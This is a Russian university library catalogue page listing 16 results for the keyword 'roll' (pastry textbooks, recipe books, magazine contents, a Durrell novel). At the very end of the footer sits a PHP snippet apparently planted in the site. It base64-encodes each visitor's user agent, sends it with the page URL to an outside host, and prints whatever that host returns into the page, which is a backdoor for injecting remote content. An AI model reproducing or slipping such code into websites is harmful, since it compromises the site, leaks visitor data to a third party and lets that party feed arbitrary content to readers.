Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

48 пользователей


Зарегистрированных: 1 

Скудин Иван Борисович


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=РУЛЕТ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 16
1. 
Табаторович, Александр Николаевич. Товароведение и экспертиза качества мучных кондитерских изделий [Текст] / А. Н. Табаторович, О. Д. Худякова ; дар. О. Д. Худякова, 2016. - 140 с.
Держатели документа (Информация об экземплярах) 

В учебном пособии рассмотрены вопросы терминологии, классификации, пищевой ценности, формирования и оценки качества основных видов и разновидностей мучных кондитерских изделий. Классификация ассортимента, показатели качества и безопасности представлены в соответствии с действующими нормативными документами и Техническими регламентами Таможенного союза.

Пособие предназначено для студентов высших учебных заведений, обучающихся по направлению подготовки 38.03.06 "Торговое дело", профиль Товароведение и экспертиза товаров, при изучении раздела "Кондитерские товары" в рамках дисциплины "Товароведение и экспертиза зерномучных и кондитерских товаров". Может быть полезно для товароведов-экспертов, коммерсантов и других практических работников, чья деятельность связана с производством, продажей и хранением мучных кондитерских изделий.

2. 
Десерты и напитки [Текст] / сост. Е. В. Шиш ; дар. В. А. Козлова, 1995. - 490, [1] с.
Держатели документа (Информация об экземплярах) 
3. 
Кузнецова, Людмила Семеновна. Технология и организация производства кондитерских изделий [Текст] / Л. С. Кузнецова, М. Ю. Сиданова, 2009. - 478, [1] с.
Держатели документа (Информация об экземплярах) 

Рассмотрена технология переработки пищевого сырья в сахарные и мучные кондитерские изделия. Приведены требования к качеству сырья при его закупке, хранении и подготовке к первичной переработке, химический состав и свойства сырья и сведения о его подверженности изменениям под влиянием теплового, механического и других видов воздействия. Изложены методика составления рецептур кондитерских изделий и требования к качеству готовой продукции и ее хранению.

Во 2-е издание внесены исправления и дополнения, связанные с введением в действие новых ГОСТов на пищевые продукты по состоянию на 1 января 2009 г.

Для студентов средних профессиональных учебных заведений. Может быть полезен студентам вузов и специалистам кондитерского производства.

4. 
Питание и общество. - Журнал, 2008г. № 2
Оглавление 
  • Плесенкова, Н. Развитие профессионального образования - стратегически важная задача / Н. Плесенкова, О. Аштаева. - с.3
    Кл. слова: ОБРАЗОВАНИЕ ПРОФЕССИОНАЛЬНОЕ
  • Торговля столицы в цифрах и фактах. - с.4-5
  • Лежина, Е. Об изменениях в санитарно-эпидемиологических правилах / Е. Лежина. - с.7
    Кл. слова: ПРАВИЛА САНИТАРНЫЕ
  • Ниворожкин, М. От слова пора переходить к делу / М. Ниворожкин. - с.8
  • Номофилова, Н. II Международный Фестиваль кулинарного искусства Украины. / Н. Номофилова. - с.10-11
  • Номофилова, Н. "Золотая Кулина" / Н. Номофилова. - с.12-13
  • Сучкова, Е. Шоколадный велюр / Е. Сучкова. - с.20
    Кл. слова: ВЕЛЮР
  • Сизых, В. Холодные закуски / В. Сизых. - с.21
    Кл. слова: ЗАКУСКА ХОЛОДНАЯ
  • Мешков, А. Рулет из филе говядины и крабов в слоеном тесте / А. Мешков. - с.22-23
    Кл. слова: РУЛЕТ
  • Шарлотки на все вкусы. - с.26
    Кл. слова: ШАРЛОТКА
  • Филонов, М. Сам себе создай банановый рай / М. Филонов. - с.27
    Кл. слова: БАНАН
5. 
Питание и общество. - Журнал, 2011г. № 7
Оглавление 
  • Ковалев, Н. И. Из глубины веков. Кисели / Н. И. Ковалев, М. Н. Куткина, Н. Я. Карцева. - с.9
  • Кучер, Л. Дипломатический протокол: готовимся к приему / Л. Кучер, Л. Шкуратова. - с.10
  • Румянцева, Е. Эко-минимум для каждого / Е. Румянцева. - с.11
  • Демченко, Э. Нужна ли поварам математика? / Э. Демченко. - с.12
  • Сальков, Петр. Мастер-класс от Башира Гурбанова / П. Сальков. - с.14-15
  • Мастер-класс канадской олимпийской команды кулинаров. - с.16-17
  • Номофилова, Н. Арт-класс "ЕврАзии" / Н. Номофилова. - с.18-19
  • Рулет из баранины. - с.21
  • Свекольник на квасе с рыбой. - с.21
  • Коновалов, К. Централизованное производство кулинарной продукции / К. Коновалов, А. Шебукова, М. Шулбаева. - с.22-23
  • Кулинарный словарик. - с.23
  • Питание и наука. - с.24
  • Вопрос-ответ. - с.25-26
  • Оптимизация зарплаты. - с.27-28
  • Пузырев, Денис. Защитим себя от дыма? Речь не о пожаре, а о курении / Д. Пузырев, Н. Михалев. - с.29
  • Арефьева, Елена. Ах, как пьянит их аромат!.. / Е. Арефьева. - с.30-31
  • Каширина, Елена. Рис, или Сарацинское зерно / Е. Каширина. - с.31-32
  • Симонов, Г. Дар пчелы - бесценный дар / Г. Симонов. - с.33-34
  • Юшкова, А. Надо ли худеть во что бы то ни стало? / А. Юшкова, А. Ермилов. - с.34-35
  • Арефьева, Елена. Во саду ли в огороде... / Е. Арефьева. - с.36-37
  • Киреевский, Игорь. Обедаем с Гоголем. Миргород / И. Киреевский. - с.38-39
  • Амирасланов, Тахир. Дастан о маджуне / Т. Амирасланов. - с.39-40
6. 
Питание и общество. - Журнал, 2012г. № 4
Оглавление 
  • Печень с яблоками. - с.1
  • Школьное меню в Интернете. - с.2
  • Экскурс в интернетные меню. - с.3
  • Игрушина, Елена. А судьи кто? Что и как они судят? / Е. Игрушина. - с.4
  • Сальков, П. Ген творчества - по наследству / П. Сальков. - с.6-7
  • Арефьева, Анастасия. Самые "вкусные" города мира / А. Арефьева. - с.8-9
  • Самойлов, Юрий. Без руля и без ветрил... / Ю. Самойлов. - с.10-11
  • Кучер, Л. Национальный этикет делового общения / Л. Кучер, Л. Шкуратова. - с.12-13
  • Мироевская, Н. Обновленный справочник / Н. Мироевская. - с.14
  • На любой вкус. - с.15
  • Арефьева, Елена. "Ах, картошка, объеденье!.." / Е. Арефьева. - с.17
  • Питание и наука. - с.18-19
  • Ковалев, В. "Посадил дед репку..." / В. Ковалев. - с.20-21
  • Любина, Е. Блины в разных кухнях мира / Е. Любина. - с.22-23
  • Каширина, Е. "Несерьезная" закуска / Е. Каширина. - с.24-25
  • Киреевский, Игорь. Санкт-Петербург. "Ревизор" / И. Киреевский. - с.26-27
  • Для здоровых глаз. - с.27
  • Дюма, Александр. Индейка, в девичестве - мелеагрида / А. Дюма. - с.28
  • Арефьева, Анастасия. Шиповник шиповат, да витаминами богат / А. Арефьева. - с.29
  • Ковалев, Н. И. Из глубины веков / Н. И. Ковалев, М. Н. Куткина, Н. Я. Карцева. - с.30-31
  • Арахисовый суп с креветками. - с.32
  • Апельсиново-томатный суп по-флоридски. - с.32
  • Рулет "Венский"
7. 
Вопросы социального обеспечения. - Журнал, 2011г. № 7
Оглавление 
  • Об итогах деятельности Минздравсоцразвития в 2010 году. - с.2-6
  • О пенсиях. - с.7
  • Калинская, Е. Обсудили модернизацию здравоохранения на 2011-2012 годы / Е. Калинская. - с.7-8
  • Всероссийский конкурс "Лучший социальный работник". - с.8
  • Горбунова, И. Элексир для всестороннего развития / И. Горбунова. - с.9-11
  • Мякшин, Н. Опыт северных стран / Н. Мякшин. - с.11
  • Хомец, Н. Проект "Единый социальный телефон" / Н. Хомец. - с.12
  • Теперь я - полноправный член коллектива. - с.12
  • Подведены итоги регионального конкурса. - с.13
  • Степанова, К. Выходные с "Лучшими друзьями" / К. Степанова. - с.13
  • Форум "Карьера". - с.14
  • Обновление "Стратегии-2020". - с.15
  • Миграция как ресурс развития. - с.15-16
  • Работу - россиянам!. - с.16
  • Важнейшее направление - содействие самозанятости. - с.17
  • Соколовская, М. Что будет? / М. Соколовская. - с.18-19
  • Программа сопровождения для людей с инвалидностью. - с.20
  • Рейтинги учреждений здравоохранения, образования и ЖКХ. - с.21
  • Московская, А. Роль бизнеса в формировании российской модели профессии / А. Московская. - с.22
  • Словарь ВСО: дауншифтинг. - с.23
  • Огарков, А. Должностные полномочия: виды и варианты распределения / А. Огарков. - с.24-25
  • Запретить курить в подъездах и на улицах. - с.27
  • Правда о средствах для похудения. - с.27-28
  • Без суда и следствия. - с.29
  • Соглашение о сотрудничестве. - с.30
  • Самые привлекательные страны. - с.30
  • Ушли в отрыв. - с.31
  • Что сделать для восстановления экономики?. - с.31-32
  • Законопроект нарушает права ребенка. - с.33
  • Преодоление социальной изоляции недееспособных граждан. - с.33-34
  • Прибыли много не бывает. - с.35
  • Рубль - "тихой сапой" к новым вершинам. - с.35
  • Сохранить нельзя потратить. - с.35-36
  • Миронов, В. Россия лидирует по количеству и качеству миллиардеров: плохо это или хорошо? / В. Миронов, О. Пономаренко. - с.36-37
  • Социальное обеспечение и социальное страхование. - с.38-40
  • Здравоохранение. - с.40
  • Труд и занятость. - с.40-41
  • Трошина, Т. Вопрос-ответ / Т. Трошина, А. Кикинская. - с.41-42
  • Усиление социальной поддержки ленинградских блокадников. - с.43
  • Любовь и счастье в семье. - с.43
  • Гришаева, Г. Изменить порядок вещей / Г. Гришаева. - с.44
  • Муштенко, Г. Помню / Г. Муштенко. - с.45-46
  • Китайцам обеспечат счастливую старость по закону. - с.44
  • Город для пожилых. - с.46
  • Росгидромет: лето-2011 будет холоднее. - с.48
  • Сколько пить воды?. - с.47
  • Официальный брак и образование. - с.48
  • Лучшая инвестиция. - с.48
  • Оладьи из тыквы с яблоками. - с.49
  • Бутерброд-рулет с мясом. - с.49
  • Нанокастрюля на кухне. - с.49
Держатели документа (Информация об экземплярах) 
8. 
Кулинарные рецепты: Из "Книги о вкусной и здоровой пище" [Текст] / сост. Л. И. Воробьева ; дар.: Л. К. Жарина, Л. К. Жарина, 1988. - 334, [1] с.
Ключевые слова 
ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ИКРА -- ПАШТЕТ -- СОУС -- МАЙОНЕЗ -- БУЛЬОН -- СУП -- ОКРОШКА -- МЯСО -- КОТЛЕТА -- ТЕФТЕЛИ -- ШНИЦЕЛЬ -- ПЕЛЬМЕНИ -- КУРИЦА -- ДИЧЬ -- РЫБА -- МОРЕПРОДУКТ -- ТВОРОЖНИКИ -- ВАРЕНИК -- БЛИНЧИКИ -- ЗАПЕКАНКА -- ПУДИНГ -- ОМЛЕТ -- ОВОЩИ -- ГРИБЫ -- КАРТОФЕЛЬ -- ФОРШМАК -- КАША -- ПЛОВ -- КЛЕЦКИ -- ЧЕБУРЕК -- КУКУРУЗА -- ФАСОЛЬ -- ГОРОХ -- ЧЕЧЕВИЦА -- ПИРОЖОК -- ВАТРУШКА -- БУЛКА -- ОЛАДЬИ -- РУЛЕТ -- ПИРОЖНОЕ -- ТОРТ -- КЕКС -- ПОНЧИК -- ХВОРОСТ -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- МУСС -- КРЕМ -- ПУДИНГ -- ШАРЛОТКА -- МАРИНАД -- СОЛЕНЬЕ -- МАРИНАД -- КОНСЕРВИРОВАНИЕ -- ЗАМОРАЖИВАНИЕ -- ЯГОДЫ
Держатели документа (Информация об экземплярах) 
9. 
Микроволновая кухня каждый день [Текст] / сост. Ю. Р. Васильев ; дар. И. Ю. Морозов, 1995. - 383 с.
Держатели документа (Информация об экземплярах) 
10. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
11. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

12. 
Мазепа Е. В. Практикум для кондитера [Текст] : Учеб. пособие / Е. В. Мазепа, 2002. - 372,[2] с.
Держатели документа (Информация об экземплярах) 
13. 
Сборник рецептур мучных кондитерских и булочных изделий [Текст] : Для предприятий общественного питания / Сост. А. В. Павлов, 2001. - 294 с.
Держатели документа (Информация об экземплярах) 
14. 
Сборник рецептур мучных кондитерских и булочных изделий [Текст] / сост. А. В. Павлов, 1998. - 294 с.
Держатели документа (Информация об экземплярах) 
15. 
Сборник рецептур мучных кондитерских и булочных изделий [Текст] / сост. А. В. Павлов, 2014. - 294 с.
Держатели документа (Информация об экземплярах) 
16. 
Даррелл, Джеральд. Мясной рулет [Текст] : встречи с животными / Д. Даррелл ; пер. с англ. М. Н. Ковалевой, 1989. - 236, [2] с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3025 - 21.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.88 с.20 запросов, 0.50c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;